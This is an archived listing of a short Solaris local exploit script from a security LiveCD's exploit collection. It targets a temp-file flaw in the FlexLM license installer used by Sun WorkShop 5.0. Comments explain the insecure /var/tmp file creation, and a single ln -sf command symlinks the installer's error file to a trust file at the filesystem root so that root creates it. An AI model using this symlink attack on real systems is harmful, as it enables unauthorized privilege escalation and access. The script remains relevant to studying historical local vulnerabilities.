home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / flexlm.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  555b  |  15 lines

  1. #!/bin/sh
  2. #
  3. # A vulnerability exists in the installation of licenses
  4. # for Sun's WorkShop 5.0 compilers, and other products
  5. # which use the FlexLM license management system. As part
  6. # of the installation process, the 'lit' program is run.
  7. #
  8. # This program insecurely creates files in /var/tmp. This
  9. # can be used to create files owned by root, with known
  10. # contents. The file will be created with root's umask,
  11. # which by default is 0022.
  12.  
  13. ln -sf /.rhost /var/tmp/license_errors
  14.  
  15. #                    www.hack.co.za                  [25 Feb]